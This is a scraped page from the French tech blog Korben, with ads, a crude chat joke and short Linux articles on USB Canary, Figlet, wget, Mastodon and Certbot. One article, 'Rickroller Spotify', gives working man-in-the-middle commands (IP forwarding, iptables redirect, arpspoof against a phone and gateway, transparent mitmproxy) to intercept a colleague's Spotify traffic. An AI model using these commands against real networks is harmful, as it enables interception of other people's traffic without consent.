Korben - Site d'actualité geek et tech



  • DANS TON CHAT (BASHFR)

    Supermouton : 'tain truc de ouf
    J35U15P45G33K : 'Je vais feindre de l'interêt...que se passe-t-il?
    Supermouton : (enfoiré) au boulot, je bosse sur l'ordi tranquille à faire ma 3D toussa
    J35U15P45G33K : ça me passionne pour l'instant
    Supermouton : (atta atta) et la on frappe à la porte, je me retourne vers la porte et je vois mon patron qui rentre. Soudain il se met à tirer une tronche pas possible et je lui demande si ça va.
    Supermouton : et sur mon ecran ya un gars en train d'enculer un autre gars. Je lui dis que je sais pas d'ou ca vient et il mé répond que je fais ce que je veux tant que je rend les anims en temps et en heure...
    Supermouton : J'insiste en lui repetant que je sais pas dou ca vient...lui sort de la salle et je comprends à sa tronche qu'il me croit pas.
    J35U15P45G33K : Pourquoi tu vas sur des sites gays toi?
    Supermouton : Mais non ducon, je sais pas ce que ça foutait là. Ca a surgit de nulle part. En fait j'ai eu la réponse le jour d'après.
    Supermouton : Tout est une question de timing. Avant que j'arrive mon patron active sur l'ordi ou je bosse un logiciel de contrôle d'ordi à distance. Quand il frappe à la porte et que je me retourne, un pote au patron dans l'autre salle ouvre le navigateur dont personne se sert avec en page d'accueil ce site gay. Il a même fait un raccourci clavier pour l'ouvrir et bien sûr le navigateur est pas sur le dock.
    Supermouton : Mon patron est un gros geek o/ Je surkiffe l'ambiance au boulot
    J35U15P45G33K : C'est quoi ce logiciel
    Supermouton : c'est teamviewer
    J35U15P45G33K: ok
    * Lea has joined
    Lea : Quoi de nuef?
    J35U15P45G33K : Fil vas sur des sites gays.

    -- http://danstonchat.com/11619.html

  • Disque dur externe Lacie D2 Quadra 3To

    229 €

    Compatible PC et MAC
    3 To (capacité maximale de l appareil. La capacité finale disponible peut être inférieure)
    7200 tr/min

    Un serveur NAS 2 baies silencieux et sans ventilateur


    En Savoir +

  • RSS Emplois sécurité


  • Ordinateur tout-en-un HP ProOne 400 G2

    PROMO PC 17% de réduction

    Facile à déployer, élégant et doté de nombreuses fonctionnalités, l’ordinateur tout-en-un HP ProOne 400 de 50,8 cm (20 pouces) constitue un investissement judicieux avec ses options de collaboration, de gestion et de sécurité de classe entreprise.

    Processeur Intel® Core™ i3-6100T avec carte graphique Intel HD 530 (3,2 GHz, 3 Mo de mémoire cache, 2 cœurs)
    SATA 500 Go, 7200 tr/min
    4 Go de mémoire DDR4-2133 SDRAM


    En Savoir +

  • Site hébergé par
    Agarik Sponsor Korben
  • Selection de contenus

  • Les articles dans "Linux"

    USB Canary – Pour savoir quand on utilise un port USB à votre insu

    Commentaires fermés sur USB Canary – Pour savoir quand on utilise un port USB à votre insu

    Si vous êtes sous Linux et que vous voulez savoir si quelqu'un a branché une clé USB ou un appareil USB sur votre ordinateur pendant votre absence, voici USB Canary !

    Cet outil dont les sources et la doc sont dispo ici permet de surveiller vos ports USB, y compris quand votre ordinateur est verrouillé. Ainsi, en cas d'accès, il est capable de vous envoyer un message.

    C'est du python, donc pour l'installer, il vous faudra des bibliothèques tierces (à installer avec la commande pip) comme :

    (La doc est ici)

    Ensuite, en éditant le fichier settings.json, vous pourrez configurer les moyens d'alerte (Slack ou SMS) et pour le lancer (ou l'arrêter) vous n'aurez qu'à lancer la commande suivante :

    ./usb_canary.py start | stop | restart

    L'autre intérêt d'un tel outil c'est que vous pouvez le modifier pour détecter quand une machine en mode airgap (non reliée à un réseau) est compromise, en adaptant le système d'alerte à votre propre système de surveillance (via de l'analyse de log ou des alertes sur d'autres ordinateurs présents dans la même zone airgappée). Les sysadmins sauront apprécier l'utilité de la chose.

    Source

    Housse de rangement pour cartes mémoires SD

    10,77 €

    Soldes et Bons Plans pour la Rentrée scolaire 2017 : livres, fournitures, cartables, ordinateurs, vêtements ... ... Voir la liste des produits

    Très pratique – Design fin et rapidement accessibleCette housse a été conçue pour permettre un accès rapide à vos cartes mémoire.Le design fin vous permet de glisser l'étui dans les poches à accessoires de votre appareil photo.Une fois que vous avez l'étui en main les cartes sont rapidement accessibles grâce à son design portefeuille.Rangements sécurisés pour vos cartes SD

    En Savoir +

    Rickroller Spotify !

    Commentaires fermés sur Rickroller Spotify !

    Saviez-vous que l'application Spotify sous Android streamait les premières secondes d'une chanson en HTTP ? Et alors me direz-vous ?

    Et alors si vous êtes sur le même réseau qu'un ami ou un collègue qui utilise Spotify sur son smartphone Android, vous allez pouvoir le rickroller !!

    Comment ?

    Et bien grâce à une petite attaque de type Man In The Middle, qui va vous permettre de lui streamer la chanson de Rick Ashley au format OGG. Attention, pour que cela fonctionne, vous devez être en IPv4 et que votre "victime" n'ait pas déjà la chanson qu'il écoute dans le cache de Spotify.

    Installez dsniff suivi d'un proxy mitm :

    apt-get install dsniff

    pip install mitmproxy

    Puis redirigez le trafic HTTP vers le port 8080 :

    sysctl -w net.ipv4.ip_forward=1

    iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

    Ensuite, identifiez l'IP du téléphone Android, l'IP de la passerelle et lancez un ARP Spoof comme ceci :

    arpspoof -t [target ip] [gateway ip]

    # Exemple : arpspoof -t 192.168.1.101 192.168.1.1

    Chopez ensuite un morceau au format OGG, précisez son nom à la ligne 3 du fichier python rickroll.py que vous pouvez télécharger ici. Et lancez la commande suivante qui mettra en place un proxy transparent sur le port 8080 qui interceptera les requêtes HTTP en direction du domaine heads-akp.spotify.com.edgesuite.net.

    Et en avant le rick roll ! Oui c'est clairement se faire chier pour pas grand-chose, mais je sais que vous êtes joueur.

    mitmproxy -T -p 8080 -s rickroll.py -i "heads-akp.spotify.com.edgesuite.net"

     

    Figlet – Pour créer des bannières ASCII rapidement

    4

    Figlet est un petit utilitaire qui permet de créer des petits textes en ASCII directement depuis votre terminal. C'est plutôt cool, surtout qu'il y a des tonnes de polices différentes que vous pouvez voir ici.

    A vous ensuite d'utiliser le paramètre -f pour appliquer le bon style au texte de votre choix.

    Et si vous le souhaitez, vous pouvez même l'utiliser comme ceci avec par exemple la commande echo, pour rendre vos sorties de scripts plus jolies.

    Vous trouverez figlet dans vos dépôts préférés ou directement sur ce site.

    Récupérer toutes les images présentes sur une page web avec Wget

    5

    Si vous avez besoin de récupérer toutes les images présentes sur une page web, sans vous prendre la tête, voici une petite ligne de commande à base de Wget qui va vous permettre de faire ça.

    Ça peut servir pour automatiser des récupérations (via un CRON) ou faire par exemple le plein de fonds d'écran ou autre, sans avoir à faire "clic droit -> enregistrer l'image" 500 fois...

    wget -nd -H -p -A jpg,jpeg,png,gif -e robots=off https://korben.info

    Enjoy !


    Apprenez toutes les bases du Développement Web

    Le Développement Web de A à Z: HTML, CSS, Javascript, jQuery, Bootstrap, PHP, MySQL, WordPress

    Cette formation de près de 40h est LA formation la plus complète que vous pouvez trouver en ligne.
    Tout ce que vous devez connaître pour débuter ou booster votre carrière de développeur Web se trouve ici : HTML, CSS, JavaScript, jQuery, Bootstrap, PHP, MySQL, WordPress…

    Vous apprendrez en réalisant des projets concrets de A à Z avec le formateur.

    L’achat vous donne un accès à vie à tout le contenu et il dispose d’une garantie de 30 jours.

    Profitez de l’offre à 10€

    Un nouveau cours pour créer des applications iOS 11 à 10€ seulement

    Apprenez à développer pour iOS 11 avec Swift 4

    Vous démarrerez par voir (ou revoir) les bases et les bonnes pratiques du langage Swift 4. Le cours s’adresse à tous ceux - même les débutants - qui désirent maîtriser Swift 4 jusqu’à devenir un développeur confirmé.Vous découvrirez comment intégrer de la géolocalisation, des webservices et du drag-and-drop à vos applications. Avec Core ML et ARKit, vous irez même encore plus loin en créant des apps qui intègrent machine learning et réalité virtuelle !Cette formation sera mise à jour toutes les semaines pour intégrer les dernières fonctionnalités jusqu’à la stabilisation de Xcode et la sortie finale d’iOS 11.

    Pour seulement 10€, profitez de notre remise spéciale sur ce cours et de l’offre garantie satisfait ou remboursé sous 30 jours.

    Pour commencer à coder sur iOS 11 c'est ici

    Mastodon – Un copié collé de Twitter libre et décentralisé

    9

    Depuis quelques jours, je reçois des tas de messages de gens qui me demandent d'aller jeter un oeil à Mastodon, un nouveau clone de Twitter...

    Mastodon error image

    La particularité et la force de Mastodon, c'est qu'il s'agit d'un logiciel libre qui permet de faire tout pareil que sur Twitter, mais de manière totalement décentralisée.  DM, mentions, like et compagnie, c'est un pur copié collé en termes de fonctionnalité avec des petits trucs en plus comme des emoticons, des flux public ou encore 500 caractères contre 140 pour Twitter. C'est vraiment un gros boulot très bien exécuté !!

    Le look sombre sur plusieurs colonnes me fait penser à Tweetdeck et l'outil est actuellement déployé sur plusieurs instances que vous pouvez retrouver ici pour vous inscrire (Faut que vous vous répartissiez dessus sinon, les serveurs vont pêter). Des clients desktops et mobiles sont également déjà proposés en beta.

    Alors des clones de Twitter libres et décentralisés, j'en ai déjà vu des tonnes et malheureusement, aucun n'a réellement fonctionné en termes d'adoption.

    Est-ce que Mastodon décollera et viendra chatouiller Twitter ? J'en doute, en tout cas, pas sous cette forme. Il faudrait une grosse levée de fond, des armées de commerciaux, des vedettes de Twitter qui basculent pour entrainer avec eux leurs followers, ainsi que des applications et des fonctionnalités vraiment innovantes pour espérer grappiller des internautes à Twitter...

    Évidemment, cela peut aussi se faire grâce à la communauté, mais j'ai peur que comme pour le bien triste Diaspora, cela se transforme en un Barbuland intolérant et que les échanges ouverts du début, laissent place à la rudesse d'une communauté bien renfermée sur elle-même, résumant le contenu à un flot continu de " * ça pu, c'est pas libre !", dégoutant ceux qui auraient pu préférer cet outil à Twitter ou Facebook dans leur vie de tous les jours.

    On verra bien... mais vous l'aurez compris, à moins que Twitter ferme soudainement ses portes et que tout le monde, pris de panique, migre sur Mastodon, je ne suis pas plus convaincu que ça, surtout à une époque ou le micro blogging (sur d'autres plateformes que Twitter) est un peu passé de mode face à des outils malheureusement plus fermés comme Slack ou Telegram mais qui explosent en terme d'usage.

    Enfin, on verra bien jusqu'où Mastodon ira. Je pense que l'outil aura son public, comme Diaspora ou d'autres mais pas certain qu'il devienne mainstream. Pourtant on en aurait bien besoin pour reprendre la main sur nos données et nos services. Quoiqu'il en soit, je lui souhaite le meilleur pour la suite !

    POUET !!

    Sécuriser facilement et gratuitement un site avec HTTPS

    31

    Vous connaissez sans doute tous, Let's encrypt qui permet d'avoir un certificat SSL gratuit pour basculer son site en HTTPS. Mais connaissez-vous Certbot, un outil proposé par l'EFF (Electronic Frontier Foundation) qui permet d'obtenir en une ligne de commande son certificat et de configurer dans la foulée son serveur web ?

    Je n'avais pas encore pris le temps de le tester et je me dis que c'est l'occasion aujourd'hui de vous en faire un petit tuto rapide. Vous allez voir, c'est rapide, sans douleur et de toute façon, vous devrez tous y passer.

    Voici donc comment migrer un site web (sous WordPress dans mon exemple, mais ça fonctionne avec tout) de HTTP vers HTTPS.

    Première étape : Installer CERTBOT sur votre serveur.

    Pour cela, téléchargez le script, rendez le executable et lancez-le :

    wget https://dl.eff.org/certbot-auto

    chmod a+x certbot-auto

    Seconde étape : Générez les certificats.

    Si comme moi, vous utilisez nginx, lancez la commande :

    ./certbot-auto --nginx

    Et si vous utilisez Apache :

    ./certbot-auto --apache

    Certbot va alors lister vos virtualhosts (les sites web présents sur votre serveur). Entrez les numéros de ceux que vous voulez migrer en HTTPS. Si c'est votre première fois, je vous invite à le faire site par site. Dans le cas d'un WordPress, pensez aussi à désactiver les plugins, car certains pourraient poser problème.

    À partir de là, Certbot va générer les certificats Let's Encrypt qui vont bien et modifier la conf Apache / Nginx pour que ce soit le HTTPS qui soit activé par défaut pour votre site. Certbot vous demandera d'ailleurs si vous voulez passer exclusivement en HTTPS (2/ Secure) ou garder aussi une connexion HTTP (1/ Easy).

    Je vous recommande de choisir l'option 2 pour éviter les contenus dupliqués. Certbot va encore prendre quelques secondes et voilà, la configuration est terminée. C'était facile non ? À vous de tester votre site en HTTPS maintenant. Il se peut que vous ayez un peu de "mixed content"... Pour le régler, vous devrez peut être corriger certains appels dans votre thème, parfois dans vos plugins, voire préciser votre URL en HTTPS dans votre fichier wp-config.php comme ceci :

    define('WP_HOME','https://VOTRESITE.com');
    define('WP_SITEURL','https://VOTRESITE.com');

    Si malgré cela, vous remarquez que votre site reste accessible en HTTP aussi, éditez votre VirtualHost et décommentez la partie concernant les redirections 301 de HTTP vers HTTPS. Voici ce que j'ai comme exemple sous nginx :

    Pour faire tester votre config SSL, vous pouvez aussi utiliser le service ssllabs dont j'ai déjà parlé, en utilisant cette URL :

    https://www.ssllabs.com/ssltest/analyze.html?d=URLDEVOTRESITE.COM

    3ème étape : Automatiser le renouvellement de vos certificats.
    (suite…)

    6 outils pour cloner

    un disque dur sous Windows et Linux

    Cloner c’est facile…Bon, ok, cloner un bébé, c’est déjà plus complexe mais un disque dur, c’est l’enfance de l’art. Alors bien sûr le logiciel le plus connu pour ça, est Ghost de Symantec mais au prix de 999,99 euros HT (j’déconne, je ne connais pas le prix en vrai), c’est déjà plus rentable de se mettre à cloner

    Dépanner, entretenir et hacker son PC

    Certains outils sont déjà contenus dans d’autres outils.
    Pour éviter d’avoir des dizaines de logiciels, seuls quelques uns sont réellement utiles à posséder.
    Malgré tout, une description de chacun des outils est disponibles sur cette page